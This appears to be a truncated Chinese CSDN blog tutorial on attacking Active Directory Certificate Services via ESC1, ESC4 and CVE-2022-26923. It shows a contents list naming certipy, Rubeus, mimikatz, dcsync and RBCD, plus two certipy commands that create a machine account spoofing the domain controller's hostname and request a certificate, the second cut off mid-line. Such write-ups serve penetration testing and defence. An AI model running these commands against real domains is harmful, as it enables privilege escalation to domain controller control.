ADCS ESC1+ESC4+CVE-2022–26923

本文详细介绍了如何利用CVE-2022-26923漏洞创建特殊账户并请求证书,进而获取域控权限。通过两种方式,包括证书请求hash和RBCD,展示了如何利用拿到的证书进行权限提升。同时,讨论了ECS1和ESC4漏洞的利用条件、步骤以及相关环境配置,提供了漏洞扫描和利用的命令示例。
摘要由CSDN通过智能技术生成

目录

CVE-2022–26923

创建机器账户并指定dnsHostName为dc的域名

 用该机器账户向ADCS请求证书

拿到证书后获取域控权限的2种方式

方式1 使用证书请求hash

 dcsync

方式2  RBCD

bug

 ECS1

漏洞利用方式1

certipy

漏洞利用方式2

certify+Rubeus+mimikatz

ESC4

环境

漏洞利用 ​编辑

其他情况


CVE-2022–26923

创建机器账户并指定dnsHostName为dc的域名

certipy account create -u cert@hacktest.com -p Admin123456. -dc-ip 10.211.55.3  -user win -pass win@123456 -dns 'DC.hacktest.com'

 用该机器账户向ADCS请求证书

certipy req -u 'win$'@hacktest.com -p win@123456 -target 10.211.55.7 -dc-ip

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值